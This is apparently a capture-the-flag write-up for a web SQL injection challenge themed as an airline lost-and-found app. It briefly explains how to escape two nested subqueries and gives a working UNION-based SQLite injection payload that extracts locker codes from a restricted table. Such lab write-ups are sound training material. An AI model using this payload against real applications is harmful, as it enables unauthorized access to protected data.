Files
OffSec-CTF/web-sqli/01_airline_lost_found/writeup
2026-05-10 20:42:33 +02:00

5 lines
257 B
Plaintext

The original query are two nested subqueries so to escape we need to close two parenthesis. After that I can union a select.
Final Query:
Prova') OR 1=1 AND sqlite_version()=sqlite_version()) UNION SELECT 1,locker_code,3,4,5,6,7,8 FROM restricted_items --